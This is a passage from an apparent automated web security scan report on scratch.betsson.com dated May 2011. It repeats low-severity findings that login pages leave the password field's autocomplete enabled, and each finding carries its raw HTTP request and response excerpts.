Connection: close
Content-Length: 102712


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.50. https://scratch.betsson.com/en/Fantasy/Knights-Battle

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Knights-Battle

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Fantasy/Knights-Battle HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:56 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:56 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.51. https://scratch.betsson.com/en/Fantasy/Love-Birds

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Love-Birds

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Love-Birds; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Love-Birds HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:50 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:50 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.52. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Lucky-Diamonds

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Lucky-Diamonds; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Lucky-Diamonds HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:29 GMT
Connection: close
Content-Length: 102721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.53. https://scratch.betsson.com/en/Fantasy/Master-Mix

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Master-Mix

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Master-Mix; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Master-Mix HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:18 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:18 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.54. https://scratch.betsson.com/en/Fantasy/Memory-Madness

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Memory-Madness

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Memory-Madness; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Memory-Madness HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:53:01 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:53:01 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.55. https://scratch.betsson.com/en/Fantasy/Ocean-Pearl

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Ocean-Pearl

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Ocean-Pearl; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Ocean-Pearl HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:27 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:27 GMT
Connection: close
Content-Length: 102703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.56. https://scratch.betsson.com/en/Fantasy/Outer-Space

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Outer-Space

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Outer-Space; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Outer-Space HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:14 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:14 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.57. https://scratch.betsson.com/en/Fantasy/Super-Chance

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Super-Chance

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Super-Chance; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Super-Chance HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:36 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:36 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.58. https://scratch.betsson.com/en/Fantasy/The-Fairy-Tale

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Fairy-Tale

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/The-Fairy-Tale; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/The-Fairy-Tale HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:06 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:06 GMT
Connection: close
Content-Length: 102711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.59. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Lost-Maya

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/The-Lost-Maya; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:52:07 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:52:06 GMT
Connection: close
Content-Length: 102716


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.60. https://scratch.betsson.com/en/Fantasy/Treasure-Island

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Treasure-Island

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Treasure-Island; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Treasure-Island HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:32 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:32 GMT
Connection: close
Content-Length: 102701


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.61. https://scratch.betsson.com/en/Fantasy/Zodiac

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/Zodiac

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Fantasy/Zodiac; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Fantasy/Zodiac HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:51:24 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:51:24 GMT
Connection: close
Content-Length: 102721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.62. https://scratch.betsson.com/en/GameHistory

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/GameHistory

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/GameHistory; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/GameHistory HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:56:12 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:56:11 GMT
Connection: close
Content-Length: 101271


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.63. https://scratch.betsson.com/en/Information

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Information

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Information; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Information HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:51 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:51 GMT
Connection: close
Content-Length: 104385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.64. https://scratch.betsson.com/en/News

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/News

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/News; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/News HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:35 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:35 GMT
Connection: close
Content-Length: 130056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.65. https://scratch.betsson.com/en/OurScratchcards

Summary

Severity:   Low
Confidence:   Certain
